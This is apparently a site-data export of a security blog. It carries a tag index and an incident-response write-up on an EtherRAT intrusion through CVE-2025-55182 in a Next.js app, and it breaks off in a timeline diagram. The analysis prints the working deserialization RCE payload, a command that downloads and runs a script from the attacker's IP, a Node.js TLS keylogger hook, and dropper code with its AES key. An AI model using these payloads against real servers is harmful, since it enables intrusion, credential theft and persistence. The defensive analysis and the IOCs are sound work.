[{"content":" Malware Analysis (21) Reverse Engineering (14) SIEM (27) SOC (31) .NET (4) AbuseIPDB (9) Active Directory (5) AD CS (1) AdFind (1) AES (3) AgentTesla (1) Anti-Debugging (1) Anti-VM (2) ANY.RUN (1) AnyDesk (1) AS-REP Roasting (1) AsyncRAT (1) Avr (1) AWS (1) BlackBasta (1) Blockchain (1) Broken Access Control (1) BruteForce (4) BumbleBee (1) Capa (1) CAPEv2 (1) ChaCha20 (1) ChromeHistoryView (1) Click Fix (1) Clipboard Hijacking (2) CloudTrail (1) Cobalt (1) Command Injection (1) Conti (1) CRC32 (1) Credential Dumping (2) CryptnetUrlCache (1) Cryptocurrency Stealer (2) CVE-2017-0199 (1) CVE-2017-11882 (1) CVE-2021-24762 (1) CVE-2024-14847 (1) CVE-2024-24919 (1) CVE-2024-4577 (1) CVE-2024-48990 (1) CVE-2024-6473 (1) CVE-2025-53770 (1) CVE-2025-55182 (1) CVE-2026-24061 (1) Debug (1) DFIR (8) DigitalOcean (1) DLL (2) DLL Hijacking (2) DNS Tunneling (1) Dnspy (4) Doc (1) Dridex (1) Dynamic API Resolution (1) EDR (16) ELF (4) ELF64 (1) ELK (5) Emotet (1) Endpoint Forensic (1) Escalation to L2 (7) Ethereum (1) EtherRAT (1) Event Viewer (4) Excel (1) Extension (1) False Positive (1) File-Upload (1) Fileless Malware (2) Ghidra (1) Golang (1) GOLD CABIN (1) HashDB (1) Heaven\u0026#39;s Gate (1) HTA (2) IAM (1) IDA (9) IDOR (1) IDS (2) IIS (1) Indirect Calls (1) Infostealer (3) Injection (1) Installer (1) ISO (1) JavaScript (5) JuicyPotato (1) Kerberoasting (1) Keylogger (2) LFI (2) Linux (10) LKM (1) LNK (4) Loader (1) Log Analysis (27) LOLbins (4) Lsass (2) Lumma Stealer (1) MEGA (1) Memory Analysis (2) MFTExplorer (3) Mimikatz (3) Mini Dump (1) Mongodb (1) MotW Bypass (1) Mshta (1) MSSQL (1) NAT Traversal (1) Needrestart (1) Network Analysis (8) Nmap (3) No Escalation (4) NSIS (1) Oleid (1) Olevba (2) Packer (1) Password Spraying (1) Path Traversal (3) PCAP (3) PDF (3) Pdf-Parser (2) Pdfid (2) PE (12) PECmd (2) Phishing (11) PHORPIEX (1) PoshC2 (1) Powercat (1) PowerShell (8) PowerView (2) Privilege Escalation (1) ProcDump (1) Process Injection (3) PsExec (3) Qradar (1) Ransomware (6) RAT (2) RBCD (1) RC4 (1) RCE (3) RDP (3) RegistryExplorer (2) REvil (1) Rootkit (1) RTF (1) Rtfobj (1) Rubeus (1) Rust (1) Rust-Gdb (1) S3 (1) Salsa20 (1) Sandbox (5) Sandbox Evasion (1) Scdbg (1) Self-Extracting Archive (1) SharePoint (1) Shellcode Analysis (2) Smart Contract (1) SMB (1) SMTP (1) Splunk (6) SQL Injection (3) Sqlite (1) Sqlmap (1) Srand (1) Suricata (2) Sysmon (2) T1053.003 (1) T1098.004 (1) T1110 (1) T1136.001 (1) T1190 (1) T1543.002 (1) Telnet (1) TLS Sniffer (1) Tor (1) True Positive (13) UPnP Exploitation (1) UPX (1) USB Spreading (1) VBA (4) VBScript (1) Vectored Exception Handling (1) VirusTotal (13) Vmonkey (1) Volatility3 (3) Wazuh (3) Web (1) Web Attack (8) WinDBG (1) Windows (24) Wireshark (6) WMI (1) WordPress (1) WPScan (1) X64dbg (1) Xlm-Macros (1) Xlmdeobfuscator (1) Xlsx (1) XSS (1) XWorm (1) Zeek (1) ","date":"April 16, 2026","externalUrl":null,"permalink":"/investigations/","section":"","summary":" Malware Analysis (21) Reverse Engineering (14) SIEM (27) SOC (31) .NET (4) AbuseIPDB (9) Active Directory (5) AD CS (1) AdFind (1) AES (3) AgentTesla (1) Anti-Debugging (1) Anti-VM (2) ANY.RUN (1) AnyDesk (1) AS-REP Roasting (1) AsyncRAT (1) Avr (1) AWS (1) BlackBasta (1) Blockchain (1) Broken Access Control (1) BruteForce (4) BumbleBee (1) Capa (1) CAPEv2 (1) ChaCha20 (1) ChromeHistoryView (1) Click Fix (1) Clipboard Hijacking (2) CloudTrail (1) Cobalt (1) Command Injection (1) Conti (1) CRC32 (1) Credential Dumping (2) CryptnetUrlCache (1) Cryptocurrency Stealer (2) CVE-2017-0199 (1) CVE-2017-11882 (1) CVE-2021-24762 (1) CVE-2024-14847 (1) CVE-2024-24919 (1) CVE-2024-4577 (1) CVE-2024-48990 (1) CVE-2024-6473 (1) CVE-2025-53770 (1) CVE-2025-55182 (1) CVE-2026-24061 (1) Debug (1) DFIR (8) DigitalOcean (1) DLL (2) DLL Hijacking (2) DNS Tunneling (1) Dnspy (4) Doc (1) Dridex (1) Dynamic API Resolution (1) EDR (16) ELF (4) ELF64 (1) ELK (5) Emotet (1) Endpoint Forensic (1) Escalation to L2 (7) Ethereum (1) EtherRAT (1) Event Viewer (4) Excel (1) Extension (1) False Positive (1) File-Upload (1) Fileless Malware (2) Ghidra (1) Golang (1) GOLD CABIN (1) HashDB (1) Heaven's Gate (1) HTA (2) IAM (1) IDA (9) IDOR (1) IDS (2) IIS (1) Indirect Calls (1) Infostealer (3) Injection (1) Installer (1) ISO (1) JavaScript (5) JuicyPotato (1) Kerberoasting (1) Keylogger (2) LFI (2) Linux (10) LKM (1) LNK (4) Loader (1) Log Analysis (27) LOLbins (4) Lsass (2) Lumma Stealer (1) MEGA (1) Memory Analysis (2) MFTExplorer (3) Mimikatz (3) Mini Dump (1) Mongodb (1) MotW Bypass (1) Mshta (1) MSSQL (1) NAT Traversal (1) Needrestart (1) Network Analysis (8) Nmap (3) No Escalation (4) NSIS (1) Oleid (1) Olevba (2) Packer (1) Password Spraying (1) Path Traversal (3) PCAP (3) PDF (3) Pdf-Parser (2) Pdfid (2) PE (12) PECmd (2) Phishing (11) PHORPIEX (1) PoshC2 (1) Powercat (1) PowerShell (8) PowerView (2) Privilege Escalation (1) ProcDump (1) Process Injection (3) PsExec (3) Qradar (1) Ransomware (6) RAT (2) RBCD (1) RC4 (1) RCE (3) RDP (3) RegistryExplorer (2) REvil (1) Rootkit (1) RTF (1) Rtfobj (1) Rubeus (1) Rust (1) Rust-Gdb (1) S3 (1) Salsa20 (1) Sandbox (5) Sandbox Evasion (1) Scdbg (1) Self-Extracting Archive (1) SharePoint (1) Shellcode Analysis (2) Smart Contract (1) SMB (1) SMTP (1) Splunk (6) SQL Injection (3) Sqlite (1) Sqlmap (1) Srand (1) Suricata (2) Sysmon (2) T1053.003 (1) T1098.004 (1) T1110 (1) T1136.001 (1) T1190 (1) T1543.002 (1) Telnet (1) TLS Sniffer (1) Tor (1) True Positive (13) UPnP Exploitation (1) UPX (1) USB Spreading (1) VBA (4) VBScript (1) Vectored Exception Handling (1) VirusTotal (13) Vmonkey (1) Volatility3 (3) Wazuh (3) Web (1) Web Attack (8) WinDBG (1) Windows (24) Wireshark (6) WMI (1) WordPress (1) WPScan (1) X64dbg (1) Xlm-Macros (1) Xlmdeobfuscator (1) Xlsx (1) XSS (1) XWorm (1) Zeek (1) ","title":"","type":"investigations"},{"content":"","date":"April 16, 2026","externalUrl":null,"permalink":"/tags/aes/","section":"Tags","summary":"","title":"AES","type":"tags"},{"content":"","date":"April 16, 2026","externalUrl":null,"permalink":"/tags/blockchain/","section":"Tags","summary":"","title":"Blockchain","type":"tags"},{"content":"Current focus: ELK SIEM · Executable analysis\nGitHub · LinkedIn\n","date":"April 16, 2026","externalUrl":null,"permalink":"/","section":"Bubka","summary":"Current focus: ELK SIEM · Executable analysis\nGitHub · LinkedIn\n","title":"Bubka","type":"page"},{"content":" TL;DR # On February 10th, 2026, an attacker targeted the Maromalix web application, beginning with an Nmap decoy scan to mask their true IP. They exploited CVE-2025-55182. The initial payload downloaded a bash script (s.sh) that installed a local Node.js environment, deployed a TLS keylogger to sniff outbound traffic, and dropped an AES-256 encrypted blob. A Stage 2 JavaScript dropper decrypted this blob into EtherRAT, a sophisticated Stage 3 implant. EtherRAT uses Ethereum smart contracts as a blockchain-based C2 resolver. After querying the primary and fallback contracts via public RPC nodes, the malware resolved its active C2 to a fallback IP (63.176.62.199). The attacker then initiated an automated post-exploitation sequence: collecting host telemetry, exfiltrating AWS/SSH/Kube credentials, establishing persistence via five different OS mechanisms, planting an SSH backdoor, and finally updating the server\u0026rsquo;s Next.js version to patch the vulnerability and secure their access.\nStage 0: Initial Access # Nmap Scan # I started by identifying possible port scanning activity. I used the display filter tcp.flags.syn == 1 \u0026amp;\u0026amp; tcp.flags.ack == 0, which isolates SYN scan packets.\nIn the screenshot, we can see a lot of different IP addresses scanning various ports on host 172.31.44.238, this is likely nmap scan with -D parameter for decoy scanning. Nmap sends extra packets with spoofed source IP addresses. The target receives a flood of scan requests from various sources, making actual IP address look like just another \u0026ldquo;random\u0026rdquo; entry in a sea of traffic\nLooking at the conversations, I observed a whole group of addresses from different subnets, confirming the use of Decoys.\nExploitation # I shifted my focus to the HTTP traffic and noticed that host 63.180.69.24 was connecting to the web server using the python-requests/2.31.0 library.\nAt 18:36, the same host started sending POST requests to the /login, /register, /contact, /checkout, /profile, and /dashboard pages with a test payload: [{\u0026quot;id\u0026quot;:\u0026quot;test\u0026quot;}].\nThen they sent a specialized payload to the /login page, which immediately caused a 500 Internal Server Error. The command they successfully injected and ran was id.\n1{ 2 \u0026#34;then\u0026#34;: \u0026#34;$1:__proto__:then\u0026#34;, 3 \u0026#34;status\u0026#34;: \u0026#34;resolved_model\u0026#34;, 4 \u0026#34;reason\u0026#34;: -1, 5 \u0026#34;value\u0026#34;: \u0026#34;{\\\u0026#34;then\\\u0026#34;: \\\u0026#34;$B0\\\u0026#34;}\u0026#34;, 6 \u0026#34;_response\u0026#34;: { 7 \u0026#34;_prefix\u0026#34;: \u0026#34;var res = process.mainModule.require(\u0026#39;child_process\u0026#39;).execSync(\u0026#39;id\u0026#39;,{\u0026#39;timeout\u0026#39;:300000}).toString().trim(); throw Object.assign(new Error(\u0026#39;NEXT_REDIRECT\u0026#39;), {digest:`${res}`});\u0026#34;, 8 \u0026#34;_formData\u0026#34;: { 9 \u0026#34;get\u0026#34;: \u0026#34;$1:constructor:constructor\u0026#34; 10 } 11 } 12} They used Node\u0026rsquo;s internal child_process module to execute a shell command directly on the server. The 500 error response leaked the output of the id command back to the attacker.\nThis exploitation chain is a direct signature of CVE-2025-55182.\nCVE-2025-55182 # CVE-2025-55182 is an unsafe deserialization critical (10/10) vulnerability in React Server Components (RSCs) that allows unauthenticated remote code execution via a single HTTP request. The vulnerability exists in the requireModule function within the react-server-dom-webpack package. It affects React 19.x and frameworks built on it, including Next.js 15.x and 16.x when using the App Router.\nAfter verifying execution, the attacker sent another payload forcing the server to download and execute a script named s.sh from their infrastructure (63.176.62.199).\n1{ 2 \u0026#34;then\u0026#34;: \u0026#34;$1:__proto__:then\u0026#34;, 3 \u0026#34;status\u0026#34;: \u0026#34;resolved_model\u0026#34;, 4 \u0026#34;reason\u0026#34;: -1, 5 \u0026#34;value\u0026#34;: \u0026#34;{\\\u0026#34;then\\\u0026#34;: \\\u0026#34;$B0\\\u0026#34;}\u0026#34;, 6 \u0026#34;_response\u0026#34;: { 7 \u0026#34;_prefix\u0026#34;: \u0026#34;var res = process.mainModule.require(\u0026#39;child_process\u0026#39;).execSync(\u0026#39;while :; do (curl -sk https://63.176.62.199:443/s.sh -o ./s.sh 2\u0026gt;/dev/null || wget -qO ./s.sh https://63.176.62.199:443/s.sh --no-check-certificate 2\u0026gt;/dev/null) \u0026amp;\u0026amp; [ -s ./s.sh ] \u0026amp;\u0026amp; chmod +x ./s.sh \u0026amp;\u0026amp; (nohup ./s.sh \u0026gt;/dev/null 2\u0026gt;\u0026amp;1 \u0026amp;) \u0026amp;\u0026amp; break; sleep 300; done\u0026#39;,{\u0026#39;timeout\u0026#39;:300000}).toString().trim(); throw Object.assign(new Error(\u0026#39;NEXT_REDIRECT\u0026#39;), {digest:`${res}`});\u0026#34;, 8 \u0026#34;_formData\u0026#34;: { 9 \u0026#34;get\u0026#34;: \u0026#34;$1:constructor:constructor\u0026#34; 10 } 11 } 12} Stage 1: Shell Script Deployment # s.sh analysis # The downloaded script starts by defining specific operational directories and downloading a self-contained Node.js binary:\n1MALWARE_DIR=\u0026#34;$HOME/.local/share/.05bf0e9b\u0026#34; 2NODE_DIR=\u0026#34;$MALWARE_DIR/.4dai8ovb\u0026#34; 3NODE_VERSION=\u0026#34;v20.11.0\u0026#34; 4NODE_URL=\u0026#34;https://nodejs.org/dist/${NODE_VERSION}/node-${NODE_VERSION}-linux-x64.tar.xz\u0026#34; 5 6mkdir -p \u0026#34;$MALWARE_DIR\u0026#34; \u0026#34;$NODE_DIR\u0026#34; 2\u0026gt;/dev/null 7cd \u0026#34;$MALWARE_DIR\u0026#34; || exit 1 8 9if [ ! -f \u0026#34;$NODE_DIR/node\u0026#34; ]; then 10# downloads and unpack node.js 11fi 12# ...[snip]... We can see the malware resides in the hidden \u0026quot;$HOME/.local/share/.05bf0e9b\u0026quot; folder. It downloads its own specific Node.js runtime (v20.11.0) into \u0026quot;$HOME/.local/share/.05bf0e9b/.4dai8ovb\u0026quot; to ensure payload compatibility regardless of the victim\u0026rsquo;s environment.\nTLS Keylogger # After setting up the environment, it creates a /tmp/.font-unix folder where it stores a .fontconfig file. This is a malicious TLS Keylogger (Sniffer).\n1mkdir -p /tmp/.font-unix 2\u0026gt;/dev/null 2 3# Keylog preload script - hooks ALL TLS connections 4cat \u0026gt; /tmp/.font-unix/.fontconfig \u0026lt;\u0026lt; \u0026#39;FCEOF\u0026#39; 5const fs = require(\u0026#39;fs\u0026#39;), 6 tls = require(\u0026#39;tls\u0026#39;), 7 p = \u0026#39;/tmp/.font-unix/.cache\u0026#39;; 8const _c = tls.connect; 9tls.connect = function(...a) { 10 const s = _c.apply(this, a); 11 s.on(\u0026#39;keylog\u0026#39;, l =\u0026gt; fs.appendFileSync(p, l)); 12 return s 13}; 14const h = require(\u0026#39;https\u0026#39;), 15 _r = h.request; 16h.request = function(...a) { 17 const r = _r.apply(this, a); 18 r.on(\u0026#39;socket\u0026#39;, s =\u0026gt; s.on \u0026amp;\u0026amp; s.on(\u0026#39;keylog\u0026#39;, l =\u0026gt; fs.appendFileSync(p, l))); 19 return r 20}; 21FCEOF It acts as an inline TLS session key extractor. By overriding Node.js\u0026rsquo;s native tls.connect and https.request modules, it intercepts all outbound encrypted connections made by the server. It captures the SSL/TLS master secrets triggered by the keylog event and appends them to a hidden file (/tmp/.font-unix/.cache). This allows the attacker to decrypt any secure communications originating from the compromised machine.\nFinally, the script drops a massive encrypted blob into $HOME/.local/share/.05bf0e9b/.1d5j6rm2mg2d.\n1cat \u0026gt; \u0026#34;$MALWARE_DIR/.1d5j6rm2mg2d\u0026#34; \u0026lt;\u0026lt; \u0026#39;BLOB_END\u0026#39; 22HVnlpRxwJyMF00X9WjlS... 3BLOB_END Stage 2: JavaScript Dropper # The next part of the bash script writes and executes a Stage 2 JS dropper (.kxnzl4mtez.js). This dropper is responsible for decrypting the previous blob into the .7vfgycfd01.js payload. It uses AES-256 in CBC mode with a hardcoded key (a3f8b2c1d4e5f6a7b8c9d0e1f2a3b4c5) and IV (d4e5f6a7b8c9d0e1).\n1cat \u0026gt; \u0026#34;$MALWARE_DIR/.kxnzl4mtez.js\u0026#34; \u0026lt;\u0026lt; \u0026#39;DROP_END\u0026#39; 2// ============================================ 3// STAGE 2: JS DROPPER 4// Filename on victim: .kxnzl4mtez.js 5// ============================================ 6 7const MALWARE_DIR = path.join(require(\u0026#39;os\u0026#39;).homedir(), \u0026#39;.local\u0026#39;, \u0026#39;share\u0026#39;, \u0026#39;.05bf0e9b\u0026#39;); 8const ENCRYPTED_BLOB = path.join(MALWARE_DIR, \u0026#39;.1d5j6rm2mg2d\u0026#39;); 9const DECRYPTED_IMPLANT = path.join(MALWARE_DIR, \u0026#39;.7vfgycfd01.js\u0026#39;); 10const NODE_BINARY = path.join(MALWARE_DIR, \u0026#39;.4dai8ovb\u0026#39;, \u0026#39;node\u0026#39;); 11 12const ALGORITHM = \u0026#39;aes-256-cbc\u0026#39;; 13const KEY = \u0026#39;a3f8b2c1d4e5f6a7b8c9d0e1f2a3b4c5\u0026#39;; 14const IV = \u0026#39;d4e5f6a7b8c9d0e1\u0026#39;; 15 16function decrypt(encryptedData) { 17 const key = Buffer.from(KEY, \u0026#39;utf8\u0026#39;); 18 const iv = Buffer.from(IV, \u0026#39;utf8\u0026#39;); 19 20 const decipher = crypto.createDecipheriv(ALGORITHM, key, iv); 21 let decrypted = decipher.update(encryptedData, \u0026#39;base64\u0026#39;, \u0026#39;utf8\u0026#39;); 22 decrypted += decipher.final(\u0026#39;utf8\u0026#39;); 23 24 return decrypted; 25} 26 27function main() { 28 try { 29 if (fs.existsSync(DECRYPTED_IMPLANT)) { 30 execute(); 31 return; 32 } 33 34 if (!fs.existsSync(ENCRYPTED_BLOB)) { 35 process.exit(1); 36 } 37 38 const encrypted = fs.readFileSync(ENCRYPTED_BLOB, \u0026#39;utf8\u0026#39;); 39 const decrypted = decrypt(encrypted); 40 fs.writeFileSync(DECRYPTED_IMPLANT, decrypted, { mode: 0o700 }); 41 42 execute(); 43 } catch (e) { 44 //...[snip]... 45 } 46} 47 48function execute() { 49//...[snip]... 50} 51 52main(); 53DROP_END I recreated the decryption routine using the hardcoded key/IV and successfully retrieved the Stage 3 script.\nStage 3: The Main Implant # Blockchain-Based C2 # The decrypted script contains header comments identifying it as EtherRAT.\nThis is a highly evasive implant that uses a blockchain-based command and control architecture via Ethereum smart contracts. Instead of hardcoding a traditional URL, it connects to a smart contract on the Ethereum mainnet. It essentially asks the blockchain, \u0026ldquo;Where should I send the victim right now?\u0026rdquo; The smart contract responds with the active C2 URL. This means the infrastructure is dynamically hosted on the blockchain, and the attacker can update the C2 at any time without altering the malware on the host.\nThe malware contains configurations for two smart contracts: a PRIMARY and a FALLBACK.\nContract Overview \u0026amp; OSINT # I checked the primary contract (0x22f96d61cf118efabc7c5bf3384734fad2f6ead4) on Etherscan. It was created on Dec-05-2025.\nLooking at the transactions, I saw multiple calls to a Set String method, confirming the attacker is actively rotating their C2 URLs.\nBy inspecting the contract\u0026rsquo;s Events logs, the changes to the contract are clearly visible. The attacker updated it 9 times, cycling through unique URLs, including direct IPs and tracking links:\nhttp://91.215.85.42:3000 http://173.249.8.102/ https://grabify[.]link/SEFKGU https://grabify[.]link/SEFKGU?dry87932wydes/fdsgdsfdsjfkl Looking at the fallback contract in the code, it contains a larger list of potential C2 endpoints, including: - https://15.116.46.18:443\n- https://63.176.62.199:443\n- https://3.78.187.211:443\n- https://3.66.227.157:443\n- https://52.59.200.147\n- https://3.78.229.44:3000\n- https://18.198.1.194:3000\n- https://63.179.143.20:3000\n- https://35.159.53.179:3000\n- https://3.125.41.44:3000\n- https://3.125.39.195:3000\n- http://91.215.85.42:3000\nEtherRAT utilizes several core functions to manage this process:\nInitialization and C2 Resolution # The script\u0026rsquo;s main() function starts by checking the locale, refusing to execute in this countries: ru, be, kk, ky, tg, uz, hy, az, ka. It then loops through the configured contracts and calls queryContract(), which makes public RPC requests to resolve the URL.\n1async function main() { 2 // CIS locale check 3 if (checkLocale()) { 4 ///...[snip]... 5 6 // Load or create state 7 if (!loadState()) { 8 ///...[snip]... 9 10 // C2 resolution 11 let c2Url = null; 12 let contractIndex = 0; 13 14 while (!c2Url \u0026amp;\u0026amp; contractIndex \u0026lt; CONTRACTS.length) { 15 const config = CONTRACTS[contractIndex]; 16 const resolvedUrl = await queryContract(config); 17 ///...[snip]... 18 if (resolvedUrl) { 19 const test = await testC2Connection(resolvedUrl); 20 21 if (test.success) { 22 ///...[snip]... 23 saveState(); 24 } Once a URL is successfully resolved, the malware tests the connection, sends a unique BotId inside a state structure, and saves this state to $MALWARE_DIR/.a3f8b2c1d4e5.json.\n1let state: { 2 botId: null; 3 c2Url: null; 4 contractIndex: number; 5 stage: number; // starts with \u0026#34;0\u0026#34; 6 firstRun: boolean; 7} Beacon Loop and ABI Analysis # The main beaconing loop continuously fetches payloads from the attacker\u0026rsquo;s server and executes them, utilizing random delays to evade detection.\n1 // Main beacon loop 2 let failureCount = 0; 3 4 while (true) { 5 try { 6 const response = await beacon(c2Url, state.botId); 7 failureCount = 0; 8 9 if (response.status === 200 \u0026amp;\u0026amp; response.body \u0026amp;\u0026amp; response.body.length \u0026gt; 10) { 10 const success = await executePayload(response.body, state.botId, c2Url); 11 12 if (success) { 13 await reportStage(c2Url, state.botId, state.stage); 14 state.stage++; 15 //...[snip]... 16 saveState(); 17 18 if (state.stage \u0026lt; 4) { 19 const delay = randomDelay(STAGE_DELAY_MIN, STAGE_DELAY_MAX); 20 await new Promise(r =\u0026gt; setTimeout(r, delay)); 21 continue; 22 } 23 } 24 } else if (response.status === 204) { 25 //...[snip]... 26 27 } catch (e) { 28 //...[snip]... 29 } 30 } 31} In the code, I noticed the specific function selector used for the RPC call (const FUNC_SELECTOR = '0x7d434425';). Since the smart contract is deployed publicly on the blockchain, I decompiled the bytecode to view the ABI (Application Binary Interface).\nThis revealed the exact function signatures: getString(address) maps to the 0x7d434425 selector (used by the bot to read the C2), and setString(string) maps to 0x7fcaf666 (used by the attacker to update the C2).\nPost-Exploitation # I continued to analyze network traffic and at 18:37, I observed the victim host (172.31.44.238) making multiple HTTP/JSON POST requests to public Ethereum RPC servers (Tenderly, Llamarpc, Flashbots) to query the smart contract for the active C2.\nOne second later, the host connected to 91.215.85.42:3000 (the URL retrieved from the primary contract). While this resulted in a 404, it successfully registered and retrieved the BotId 4ebfbc8aedf60511.\nBecause the primary C2 didn\u0026rsquo;t serve a payload, the implant logically rolled over to its FALLBACK contract configuration. The victim then established a secure connection to 63.176.62.199 over port 443, retrieving its subsequent stages masqueraded as .css and .png files.\nStage 0: Reconnaissance # The first payload executed was an aggressive reconnaissance script collecting host information, network interfaces, and checking for the existence of AWS, Kubernetes, Docker, and Git configurations.\nThe script exfiltrated the following JSON structure back to the C2:\n1{ 2 \u0026#34;type\u0026#34;: \u0026#34;recon\u0026#34;, 3 \u0026#34;timestamp\u0026#34;: \u0026#34;2026-02-10T18:37:25.434Z\u0026#34;, 4 \u0026#34;botId\u0026#34;: \u0026#34;4ebfbc8aedf60511\u0026#34;, 5 \u0026#34;hostname\u0026#34;: \u0026#34;ip-172-31-44-238\u0026#34;, 6 \u0026#34;username\u0026#34;: \u0026#34;maromalix\u0026#34;, 7 \u0026#34;homedir\u0026#34;: \u0026#34;/home/maromalix\u0026#34;, 8 \u0026#34;platform\u0026#34;: \u0026#34;linux\u0026#34;, 9 \u0026#34;arch\u0026#34;: \u0026#34;x64\u0026#34;, 10 \u0026#34;release\u0026#34;: \u0026#34;6.14.0-1018-aws\u0026#34;, 11 \u0026#34;cpus\u0026#34;: \u0026#34;Intel(R) Xeon(R) Platinum 8259CL CPU @ 2.50GHz\u0026#34;, 12 \u0026#34;cpuCount\u0026#34;: 2, 13 \u0026#34;totalMemory\u0026#34;: \u0026#34;4 GB\u0026#34;, 14 \u0026#34;freeMemory\u0026#34;: \u0026#34;3 GB\u0026#34;, 15 \u0026#34;networkInterfaces\u0026#34;: [ 16 { 17 \u0026#34;name\u0026#34;: \u0026#34;ens5\u0026#34;, 18 \u0026#34;addresses\u0026#34;: [ 19 \u0026#34;172.31.44.238\u0026#34;, 20 \u0026#34;fe80::456:62ff:fea4:482b\u0026#34; 21 ] 22 } 23 ], 24 \u0026#34;shell\u0026#34;: \u0026#34;/bin/bash\u0026#34;, 25 \u0026#34;lang\u0026#34;: \u0026#34;C.UTF-8\u0026#34;, 26 \u0026#34;uid\u0026#34;: 999, 27 \u0026#34;paths\u0026#34;: { 28 \u0026#34;ssh\u0026#34;: true, 29 \u0026#34;aws\u0026#34;: true, 30 \u0026#34;kube\u0026#34;: false, 31 \u0026#34;docker\u0026#34;: false, 32 \u0026#34;git\u0026#34;: false 33 } 34} Stage 1: Sensitive File Theft # The next payload systematically searched for sensitive files (.aws/credentials, id_rsa, .env, etc.) and scanned command history for critical keywords like password, secret, api_key, and aws_access. This data was exfiltrated to a /crypto/keys endpoint.\nStage 2: Deep Persistence # The third payload firmly entrenched the malware by executing 5 distinct persistence functions:\n1function persistSystemd() { 2// creates a user-level systemd service with a randomized name to execute the implant 3// on system startup and automatically restart it if it gets killed 4} 5 6function persistXDG() { 7// drops a hidden .desktop file into the user\u0026#39;s autostart directory (~/.config/autostart/) 8// to execute the payload whenever a graphical desktop session is launched 9} 10 11function persistCron() { 12// injects an @reboot directive into the user\u0026#39;s crontab to silently launch 13// the malware in the background every time the system reboots. 14} 15 16function persistBashrc() { 17// appends a \u0026#39;nohup\u0026#39; background execution command to ~/.bashrc, 18// triggering the malware every time the user opens a new interactive bash terminal. 19} 20 21function persistProfile() { 22// appends a background execution command to ~/.profile, 23// ensuring the malware runs whenever the user logs into a new shell session. 24} The success of these installations was reported back in a comprehensive JSON bundle.\n1{ 2 \u0026#34;type\u0026#34;: \u0026#34;persistence\u0026#34;, 3 \u0026#34;timestamp\u0026#34;: \u0026#34;2026-02-10T18:38:05.784Z\u0026#34;, 4 \u0026#34;botId\u0026#34;: \u0026#34;4ebfbc8aedf60511\u0026#34;, 5 \u0026#34;methods\u0026#34;: { 6 \u0026#34;systemd\u0026#34;: { 7 \u0026#34;success\u0026#34;: true, 8 \u0026#34;path\u0026#34;: \u0026#34;/home/maromalix/.config/systemd/user/c16a536e1a9cb42d.service\u0026#34; 9 }, 10 \u0026#34;xdg\u0026#34;: { 11 \u0026#34;success\u0026#34;: true, 12 \u0026#34;path\u0026#34;: \u0026#34;/home/maromalix/.config/autostart/a5eae68533ea066c.desktop\u0026#34; 13 }, 14 \u0026#34;cron\u0026#34;: { 15 \u0026#34;success\u0026#34;: true 16 }, 17 \u0026#34;bashrc\u0026#34;: { 18 \u0026#34;success\u0026#34;: true 19 }, 20 \u0026#34;profile\u0026#34;: { 21 \u0026#34;success\u0026#34;: true 22 } 23 } 24} Stage 3: SSH Backdoor # To guarantee alternative administrative access, the malware installed an SSH backdoor by appending the attacker\u0026rsquo;s public RSA key to the victim\u0026rsquo;s ~/.ssh/authorized_keys file under the comment maromalix@ether_dev.\n1const ATTACKER_KEY = \u0026#39;ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDFkH2PJL8n1LJP+vqMkHxVMPLfr4KrMFCnV4sJnQ6L4aNLMzFPWYpKg1McV6rqXGLLPpVFGM/+gJPLEpHbKnPvxIgZ4RhdeXk+M4O/vpTMMEMPqMGF8P3VcBaLBgqE3WDREF4XGZ9OWf7L8lUCPU7Q0C4hrbJrq3NF1c+QHRZBOJpx0z5m5F7W8QK8kbKnHBHqMkMd8dQ4F1c+KKtF3I3A2LCMsALBPMcGVbZd1O9B3KWL4r2q9V6R7BwFo8h1h1x1c1x1h1F8o8k1b1w1r1p1v1o1i1e1w maromalix@ether_dev\u0026#39;; 2const KEY_FINGERPRINT = \u0026#39;SHA256:1RquAvdtW48Ken6IVUZi/o4liu1SXlvezhgjb2fnvBg\u0026#39;; 3function installSSHKey() { 4// appends the attacker\u0026#39;s public RSA key to the 5// user\u0026#39;s ~/.ssh/authorized_keys file with maromalix@ether_dev comment 6} 7 8function exfil(data) { 9// makes POST requset to /BotId endpoint with results 10} Stage 4: Interactive Shell # The attacker then dropped an interactive JSON-based shell execution module, allowing them to route arbitrary commands through the C2 and read the output.\nCovering Tracks # In a final, highly calculated move, the attacker wiped the existing Next.js installation and forcibly upgraded the server to version 15.3.9.\n1pwd 2grep version /home/maromalix/app/node_modules/next/package.json | head -1 3cd /home/maromalix/app \u0026amp;\u0026amp; rm -rf node_modules .next package-lock.json \u0026amp;\u0026amp; npm install next@15.3.9 --save --legacy-peer-deps \u0026amp;\u0026amp; npm install --include=dev --legacy-peer-deps 2\u0026gt;\u0026amp;1 | tail -3 4cd /home/maromalix/app \u0026amp;\u0026amp; npm run build 2\u0026gt;\u0026amp;1 | tail -5 By patching the very vulnerability (CVE-2025-55182) they used to gain entry, the attacker effectively locked the door behind them, preventing competing threat actors or automated scanners from discovering and compromising their newly established foothold.\nIOCs # Type Value Description IP 63.180.69.24 Source of CVE-2025-55182 exploitation IP 91.215.85.42 Primary EtherRAT C2 IP 63.176.62.199 Fallback EtherRAT C2 and payload delivery server IP 15.116.46.18 Fallback EtherRAT C2 IP 3.78.187.211 Fallback EtherRAT C2 IP 3.66.227.157 Fallback EtherRAT C2 IP 52.59.200.147 Fallback EtherRAT C2 IP 3.78.229.44 Fallback EtherRAT C2 IP 18.198.1.194 Fallback EtherRAT C2 IP 63.179.143.20 Fallback EtherRAT C2 IP 35.159.53.179 Fallback EtherRAT C2 IP 3.125.41.44 Fallback EtherRAT C2 IP 3.125.39.195 Fallback EtherRAT C2 Contract 0x22f96d61cf118efabc7c5bf3384734fad2f6ead4` Primary Ethereum C2 Resolver Contract Contract 0xb0cbaA51b3D1D36e8E95F4F68dfBd47ED2eaA7a4` Fallback Ethereum C2 Resolver Contract File s.sh` Stage 1 Bash setup and keylogger script File .kxnzl4mtez.js Stage 2 JavaScript Dropper File .7vfgycfd01.js Stage 3 Main EtherRAT Implant Path /tmp/.font-unix/.fontconfig Malicious TLS hook script Path /tmp/.font-unix/.cache Stolen SSL/TLS master secrets file Key a3f8b2c1d4e5f6a7b8c9d0e1f2a3b4c5 AES-256-CBC Decryption Key SSH Key maromalix@ether_dev Attacker\u0026rsquo;s unauthorized public key in authorized_keys Attack Timeline # %%{init: {'theme': 'base', 'themeVariables': { 'background': '#ffffff', 'mainBkg': '#ffffff', 'primaryTextColor': '#000000', 'lineColor': '#333333', 'clusterBkg': '#ffffff', 'clusterBorder': '#333333'}}}%% graph TD classDef default 